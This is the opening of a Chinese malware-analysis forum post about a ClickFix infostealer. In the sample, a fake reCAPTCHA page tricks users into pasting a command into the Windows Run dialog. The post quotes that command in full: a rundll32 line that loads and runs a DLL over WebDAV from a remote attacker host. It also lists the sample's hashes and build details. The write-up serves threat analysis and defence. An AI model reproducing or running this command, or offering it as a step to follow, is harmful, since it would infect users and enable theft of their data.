0. 前言
这篇文章记录了笔者对一个 ClickFix 样本的完整分析过程,当然也包括了笔者还没有分析出来的部分。
该样本通过 WEB 页面传播,其通过弹出伪 reCAPTCHA 验证框,引导用户去执行了 PowerShell 命令,如下图所示:
这个样本的对抗性设计其实有点超出笔者的预期,其用到了 garble 混淆的 Go DLL、多层的 Python 脱壳、以及自解密 shellcode、EtherHiding 区块链 C2 等等技术实现隐藏并逃避分析检测。
1. 初始感染
1.1 攻击场景
ClickFix 也是一种近年来流行的社会工程学攻击手法。攻击者通过在正常网页中注入恶意广告,广告页面伪装为 Google reCAPTCHA 验证页面,诱导用户直接执行恶意指令:
例如在这个样本里,其要求用户执行以下操作:
按 Win+R 打开运行对话框
按 Ctrl+V 粘贴其写入的指令
按回车执行
1.2 实际执行的命令
其页面实际向剪贴板注入的命令是:
rundll32.exe \\term4logicway.centenary-kurgan.bet\software-distribution-dxnp2c7\meta-verify.index,#1
这条命令通过 WebDAV 协议从远程服务器加载 DLL 并执行。显然, meta-verify.index 即为伪装成系统验证文件的样本,用 #1 指定导出函数序号执行。
2. Stage 1:meta-verify.index 静态分析
2.1 样本基础信息
该前置样本,也就是 meta-verify.index 文件基础信息如下:
字段
值
文件名
meta-verify.index
大小
5,193,728 bytes (~5MB)
类型
PE32+ DLL (x86-64)
MD5
cb974e6f8c508b73e7cf061fb185af89
SHA-1
b59152c36a856dbfcb0140548f613433192b9f51
SHA-256
cb2e02747ad64b3df49cff3dc5bff9563f31309dd9ebfb9832dd979c38a1aecf
编译时间
2025-09-01 12:28:39 UTC
编译器
Mingw-w64 + Go 1.22+
混淆器
garble (-tiny -literals)
是否签名
否
是否加壳
否(各节区熵值正常)
---
来源: 看雪论坛
原文链接: https://bbs.kanxue.com/thread-291095.htm
[原创]ClickFix 多阶段信息窃取样本深度分析
430 浏览
0 回复
暂无回复,快来抢沙发吧!